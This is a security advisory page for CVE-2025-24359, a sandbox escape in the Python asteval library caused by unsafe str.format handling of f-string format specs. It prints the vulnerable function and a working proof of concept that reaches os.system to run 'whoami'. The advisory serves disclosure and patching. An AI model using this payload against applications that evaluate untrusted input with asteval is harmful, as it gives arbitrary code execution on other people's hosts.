CVE-2025-24359: ASTEVAL Vulnerable to Maliciously Crafted Format Strings Leading to Sandbox Escape

First published: Fri Jan 24 2025(Updated: )

### Summary If an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library. ### Details The vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below: ```py def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec') "formatting used in f-strings" val = self.run(node.value) fstring_converters = {115: str, 114: repr, 97: ascii} if node.conversion in fstring_converters: val = fstring_converters[node.conversion](val) fmt = '{__fstring__}' if node.format_spec is not None: fmt = f'{{__fstring__:{self.run(node.format_spec)}}}' return fmt.format(__fstring__=val) ``` The code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties. ### PoC The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine: ```py from asteval import Interpreter aeval = Interpreter() code = """ # def lender(): # ga def pwn(): try: f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}" except Exception as ga: ga = ga.obj sub = ga(dict.mro()[1],"__subclasses__")() importer = None for i in sub: if "BuiltinImporter" in str(i): importer = i.load_module break os = importer("os") os.system("whoami") # pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below # pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works pwn() """ aeval(code) ```

Credit: security-advisories@github.com security-advisories@github.com

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

• agent/weakness
• agent/title
• agent/first-publish-date
• agent/type
• collector/nvd-api
• source/NVD
• agent/severity
• agent/references
• agent/description
• agent/event
• collector/github-advisory-latest
• source/GitHub
• alias/GHSA-3wwr-3g9f-9gc7
• alias/CVE-2025-24359
• agent/software-canonical-lookup
• agent/source
• collector/mitre-cve
• source/MITRE
• agent/last-modified-date
• collector/nvd-cve
• agent/author
• agent/guess-ai
• agent/software-canonical-lookup-request
• agent/tags
• agent/softwarecombine
• collector/epss-latest
• source/FIRST
• agent/epss
• collector/github-advisory
• package-manager/pip
• vendor/asteval
• canonical/asteval asteval